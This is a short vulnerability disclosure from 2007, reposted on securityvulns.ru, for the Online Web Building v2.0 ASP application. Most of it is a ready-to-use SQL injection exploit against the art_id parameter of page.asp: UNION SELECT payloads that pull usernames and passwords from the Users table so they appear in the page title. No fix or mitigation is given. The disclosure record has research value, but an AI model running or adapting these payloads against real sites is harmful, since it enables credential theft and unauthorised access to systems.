Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  FlashGameScript v1.5.4  Remote File Inclusion Vulnerability

  Hasadya Raed

  JBrowser acces to admin/config files

  WebSpell > 4.0 Authentication Bypass and arbitrary code execution

From:XORON <xorontr_(at)_gmail.com>
Date:23.02.2007
Subject:Online Web Building v2.0 (id) Remote SQL Injection

----------------------------------------------------------------------

Online Web Building v2.0 (id) Remote SQL Injection

-----------------------------------------------------------------------

Bulan: xoron

-----------------------------------------------------------------------

Download:  http://www.aspindir.com/Goster/3439

-----------------------------------------------------------------------
Exploit: http://www.target.com/ page.asp?art_id=[SQL]

Username: page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1

Pass:  page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,
9+from+Users+where+id=1

-----------------------------------------------------------------------

Page title is username + password

-----------------------------------------------------------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server